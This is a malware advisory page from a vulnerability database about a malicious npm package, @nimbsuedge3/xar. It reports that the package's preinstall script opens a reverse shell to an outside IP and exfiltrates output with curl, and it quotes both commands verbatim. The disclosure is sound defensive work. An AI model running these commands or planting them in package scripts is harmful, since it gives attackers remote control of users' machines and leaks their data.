VDB
Sign up

MAL-2026-16301

Malicious code in @nimbsuedge3/xar (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (85a83fa3df94cc0a526feb9df2e8a877f89713501a083059a4b8ae5a9bf2fcaf) package.json declares a preinstall lifecycle script that runs `bash -i >& /dev/tcp/147.93.157.202.nip.io/8080` to open an interactive reverse shell to a bare-IP host wrapped via nip.io, and pipes shell output through `curl -X POST --data-binary @- http://canarytokens.com/terms/7dc94zmd3so67n5vbz5bxmt7v/contact.php` as an out-of-band exfiltration beacon. Both actions fire automatically on `npm install`, giving the operator of 147.93.157.202:8080 interactive shell access on the installer's host and shipping command output to the hardcoded canarytokens.com URL. The package ships no legitimate functionality consistent with this behavior.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm/@nimbsuedge3/xar

No fixed version published yet for @nimbsuedge3/xar (npm). Pin to a known-safe version or switch to an alternative.

References